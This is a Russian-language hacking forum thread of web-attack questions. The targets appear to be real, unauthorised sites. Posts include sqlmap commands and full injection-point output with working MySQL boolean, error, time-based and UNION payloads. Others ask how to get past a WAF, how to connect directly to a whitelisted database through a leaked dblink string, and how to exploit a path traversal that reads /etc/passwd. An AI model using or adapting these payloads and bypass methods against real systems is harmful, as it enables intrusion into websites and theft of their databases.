[web-hacking] Ваши вопросы

[CheckerChin]

Тоесть sqlmap её не увидит?

у sqlmap нет задачи видеть базы через ip... Это не порт сканнер.

 

[bzhk]

у sqlmap нет задачи видеть базы через ip... Это не порт сканнер.

Если nmap не видит порты базаы данных, то получается и sql inj не получится сделать?

 

[CheckerChin]

Если nmap не видит порты базаы данных, то получается и sql inj не получится сделать?

с чего это? База на другом хосте может быть.
Перед тем как ковырять это всё дело очень советую ознакомиться с базовыми навыками программирования бэкэнда.

 

[bzhk]

с чего это? База на другом хосте может быть.
Перед тем как ковырять это всё дело очень советую ознакомиться с базовыми навыками программирования бэкэнда.

С этим я знаком, нетворк показывает пост запросы отправляются на тот сервер, который сканирую на нет мнёт портов для бд

 

[CheckerChin]

С этим я знаком, нетворк показывает пост запросы отправляются на тот сервер, который сканирую на нет мнёт портов для бд

И причем тут http запросы? Мы же про базу говорили, а не про запросы

 

[Merovingen]

Вот у меня такой вопрос:Как часто сканер Burp suite может ошибаться при выводе сканирования?Вот я выявил пару потенциальных уязвимостей, несколько раз проверил. Выводит и всё...хоть ты убей одни и те жи. 1 это и наличие sql инъекции, а вторая рассинхронизация на стороне сервера, а вручную проверяю, хрен там чего... Или я не так че то делаю?

 

[k4rk4j0i]

Вот у меня такой вопрос:Как часто сканер Burp suite может ошибаться при выводе сканирования?Вот я выявил пару потенциальных уязвимостей, несколько раз проверил. Выводит и всё...хоть ты убей одни и те жи. 1 это и наличие sql инъекции, а вторая рассинхронизация на стороне сервера, а вручную проверяю, хрен там чего... Или я не так че то делаю?

Есть ложно положительные сработки(например со слепыми инъекциями), надо руками перепроверять. Все сканеры ошибаться

 

[Merovingen]

Есть ложно положительные сработки(например со слепыми инъекциями), надо руками перепроверять. Все сканеры ошибаться

А вот как понять, вот интересно там есть настройки на срабатывания такие? Единственный вариант был перепроверить на calaboratore того же самого burp и то я ему я
не очень доверяю теперь....ну или sqlmap, но там нету нужных параметров id и прочих для ввода, единственное там на кукисы грешит и вот этим можно будет проверить если. М мучаюсь какой день не могу раскрутить, скорее всего там нету ничего...

 

[c0d3x]

А вот как понять, вот интересно там есть настройки на срабатывания такие? Единственный вариант был перепроверить на calaboratore того же самого burp и то я ему я
не очень доверяю теперь....ну или sqlmap, но там нету нужных параметров id и прочих для ввода, единственное там на кукисы грешит и вот этим можно будет проверить если. М мучаюсь какой день не могу раскрутить, скорее всего там нету ничего...

Ну покажи наглядно, что тебе нашел бурп, и что ты пихаешь в мап?

 

[Merovingen]

Давай чуть позже, я щас на данный момент временно ща не компом нахожусь просто!)

Ну покажи наглядно, что тебе нашел бурп, и что ты пихаешь в мап?

 

[Merovingen]

Беда беда... Покка обновлялся бёрп, я срать пошел. Смотрю, у 12го берпа дащборд новый. Смотрю - и в туалете катях какой то. Новый. Вывод? Бёрп говно.
Ты але, сформулируй вопрос правильно. Что, как, куда ты пихаешь. И зачем. какой резалт, кроме говна, ты хочешь получить.

Я вкратце объяснил ситуацию, а вот тебя я не понял. Не надо коверкать меня!

 

[Merovingen]

Я щас нахожусь просто в таком месте, что не очень формулировать правильно мысли так, что сорри!)

 

[Merovingen]

Беда беда... Покка обновлялся бёрп, я срать пошел. Смотрю, у 12го берпа дащборд новый. Смотрю - и в туалете катях какой то. Новый. Вывод? Бёрп говно.
Ты але, сформулируй вопрос правильно. Что, как, куда ты пихаешь. И зачем. какой резалт, кроме говна, ты хочешь получить.

Я хочу убедиться о наличии ошибки, а не ложного срабатывания, что-бы дальше её проексплуатировать и выявить результат.. Тебе так понятно?

 

[kazakboo]

 

[kazakboo]

После ручных манипуляций с формой вебсервер ответил данными с такой строкой

SELECT * FROM public.dblink('hostaddr=10.67.*.* user=postgresuser* password=*** port=5002 dbname=*','select 0 AS ex FROM * WHERE * = ''webappuser@mail.com''') AS (ex int)

На удаленном IP все порты фильтруются, правильный вывод я сделал что доступ к удаленной БД по вайтлисту или что то подобное? Есть варианты обхода чтобы подключиться напрямую ?

 

[googlesearch]

Приветствую всех!посоветуйте как дальше действовать..акунетикс нашёл тайм-басед инъекцию,дальше запустил сканирования в sqlmap и он нашёл еще несколько + вытащил название бд.При попытках достать имена таблиц ничего не вышло,пейлоад sleep(5,10,15) от sqlmap через браузер отрабатывает нормально.

wafw00f - ничего не обнаружил,хотя sqlmap предупреждает про ваф

Предположим ваф что-то фильтрует ,подскажите как искать эти слова/символы для подбора тамперов? пытался подставить в рабочий пейлоад от sqlmap ,он ломался и была ошибка 'Warning. There was an unexpected database query!'

запрос мапу -> sqlmap -r /home/kali/Documents/*.txt --level=5 --risk=3 -D shop_*_v3 --random-agent --tables -v 5 --flush-session

GET /index.php?с=* HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

найденные мапом уязвимости ->

sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://target.com/index.php?с=' AND 4382=4382-- vMph
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
    Payload: http://target.com/index.php?с=' AND UPDATEXML(4536,CONCAT(0x2e,0x7178627a71,(SELECT (ELT(4536=4536,1))),0x7171717071),3141)-- ijLI
    Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://target.com/index.php?с=' AND (SELECT 7836 FROM (SELECT(SLEEP(10)))rjIn)-- utkS
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: http://target.com/index.php?с=-9915' UNION ALL SELECT CONCAT(0x7178627a71,0x79614f4d585a4466667155674446687665645a57754c4b6f794e7a444953617a52614a4b796e7361,0x7171717071),NULL-- -
    Vector:  UNION ALL SELECT [QUERY],NULL-- -
---

Вывод с проблемой отображения таблиц

[17:13:31] [INFO] the back-end DBMS is MySQL
[17:13:31] [PAYLOAD] -9402' UNION ALL SELECT CONCAT(0x7178627a71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7171717071),NULL-- -
[17:13:33] [DEBUG] performed 1 query in 1.22 seconds
web server operating system: Linux Debian
web application technology: Apache 2.4.56
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[17:13:33] [INFO] fetching tables for database: 'shop_*_v3'
[17:13:33] [PAYLOAD] -4163' UNION ALL SELECT CONCAT(0x7178627a71,JSON_ARRAYAGG(CONCAT_WS(0x666c75626665,table_name)),0x7171717071),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73686f705f6d6974696c6c655f7633)-- -
[17:13:33] [PAYLOAD] -5806' UNION ALL SELECT CONCAT(0x7178627a71,COUNT(table_name),0x7171717071),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73686f705f6d6974696c6c655f7633)-- -
[17:13:33] [WARNING] the SQL query provided does not return any output
[17:13:33] [DEBUG] searching for error chunk length...
[17:13:33] [PAYLOAD] ' AND UPDATEXML(2044,CONCAT(0x2e,0x7178627a71,(SELECT REPEAT(0x34,1024)),0x7171717071),8243)-- KNiY
[17:13:33] [PAYLOAD] ' AND UPDATEXML(2456,CONCAT(0x2e,0x7178627a71,(SELECT REPEAT(0x39,19)),0x7171717071),9421)-- hhdJ
[17:13:33] [PAYLOAD] ' AND UPDATEXML(6010,CONCAT(0x2e,0x7178627a71,(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73686f705f6d6974696c6c655f7633)),0x7171717071),9201)-- LYRg
[17:13:34] [WARNING] the SQL query provided does not return any output
[17:13:34] [PAYLOAD] -2467' UNION ALL SELECT CONCAT(0x7178627a71,JSON_ARRAYAGG(CONCAT_WS(0x666c75626665,table_name)),0x7171717071),NULL FROM mysql.innodb_table_stats WHERE database_name IN (0x73686f705f6d6974696c6c655f7633)-- -
[17:13:34] [PAYLOAD] -5449' UNION ALL SELECT CONCAT(0x7178627a71,COUNT(table_name),0x7171717071),NULL FROM mysql.innodb_table_stats WHERE database_name IN (0x73686f705f6d6974696c6c655f7633)-- -
[17:13:34] [WARNING] the SQL query provided does not return any output
[17:13:34] [PAYLOAD] ' AND UPDATEXML(2875,CONCAT(0x2e,0x7178627a71,(SELECT COUNT(table_name) FROM mysql.innodb_table_stats WHERE database_name IN (0x73686f705f6d6974696c6c655f7633)),0x7171717071),5921)-- ZtAz
[17:13:34] [WARNING] the SQL query provided does not return any output
[17:13:34] [INFO] fetching number of tables for database 'shop_*_v3'
[17:13:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:13:34] [PAYLOAD] ' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73686f705f6d6974696c6c655f7633),1,1))>51-- KaXv
[17:13:34] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
[17:13:34] [PAYLOAD] ' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73686f705f6d6974696c6c655f7633),1,1))>48-- KaXv
[17:13:34] [PAYLOAD] ' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73686f705f6d6974696c6c655f7633),1,1))>9-- KaXv
[17:13:35] [INFO] retrieved:
[17:13:35] [DEBUG] performed 3 queries in 0.52 seconds
[17:13:35] [WARNING] unable to retrieve the number of tables for database 'shop_*_v3'

при -v 5 на все последние запросы ответ кодом 200

 

[c0d3x]

Приветствую всех!посоветуйте как дальше действовать..акунетикс нашёл тайм-басед инъекцию,дальше запустил сканирования в sqlmap и он нашёл еще несколько + вытащил название бд.При попытках достать имена таблиц ничего не вышло,пейлоад sleep(5,10,15) от sqlmap через браузер отрабатывает нормально.

wafw00f - ничего не обнаружил,хотя sqlmap предупреждает про ваф

Предположим ваф что-то фильтрует ,подскажите как искать эти слова/символы для подбора тамперов? пытался подставить в рабочий пейлоад от sqlmap ,он ломался и была ошибка 'Warning. There was an unexpected database query!'

запрос мапу -> sqlmap -r /home/kali/Documents/*.txt --level=5 --risk=3 -D shop_*_v3 --random-agent --tables -v 5 --flush-session

GET /index.php?с=* HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

найденные мапом уязвимости ->

sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://target.com/index.php?с=' AND 4382=4382-- vMph
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
    Payload: http://target.com/index.php?с=' AND UPDATEXML(4536,CONCAT(0x2e,0x7178627a71,(SELECT (ELT(4536=4536,1))),0x7171717071),3141)-- ijLI
    Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://target.com/index.php?с=' AND (SELECT 7836 FROM (SELECT(SLEEP(10)))rjIn)-- utkS
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: http://target.com/index.php?с=-9915' UNION ALL SELECT CONCAT(0x7178627a71,0x79614f4d585a4466667155674446687665645a57754c4b6f794e7a444953617a52614a4b796e7361,0x7171717071),NULL-- -
    Vector:  UNION ALL SELECT [QUERY],NULL-- -
---

Вывод с проблемой отображения таблиц

при -v 5 на все последние запросы ответ кодом 200

Через error-based есть же вывод на странице? Руками крути в браузере, там и причина понятна будет.

После ручных манипуляций с формой вебсервер ответил данными с такой строкой

SELECT * FROM public.dblink('hostaddr=10.67.*.* user=postgresuser* password=*** port=5002 dbname=*','select 0 AS ex FROM * WHERE * = ''webappuser@mail.com''') AS (ex int)

На удаленном IP все порты фильтруются, правильный вывод я сделал что доступ к удаленной БД по вайтлисту или что то подобное? Есть варианты обхода чтобы подключиться напрямую ?

Если открытого порта для СУБД нет, то снаружи ни как, кроме какого нибудь phpmyadmin, adminer и тому подобных инструментов торчащих наружу (например на других портах или директориях).

 

[googlesearch]

Через error-based есть же вывод на странице? Руками крути в браузере, там и причина понятна будет.

буду пробовать ,спасибо


начал крутить через браузер :

вывел версию->имя бд-> при попытке вывести таблицы перебирал всевозможные варианты и понял что скорее всего нагрузку ломает символ '_' нижнее подчеркивание , какие есть варианты для обхода\запаковки символа?

 

[ovonel]

буду пробовать ,спасибо


начал крутить через браузер :

вывел версию->имя бд-> при попытке вывести таблицы перебирал всевозможные варианты и понял что скорее всего нагрузку ломает символ '_' нижнее подчеркивание , какие есть варианты для обхода\запаковки символа?

Сталкивался с таким, сразу скажу, я не нашел обхода и кажется никто не найдет)) За подробностями пиши в PM.

 

[Ott_Fon_Bismark]

Ребята, буду краток. Столкнулся с проблемой с обходом (traversal) директории. При переходе по пути ../../../../../../../../../../../../../../../../etc/passwd, выводит содержимое файла, но при дальнейших попытках эксплуатации результат никакого, работает только этот путь. Классические методы обфускации опробовал, но дает не 400, а 200 и ничего не выводит. Может быть, кто-то сталкивался и знает, в чем проблема. На форуме искал толком не нашел.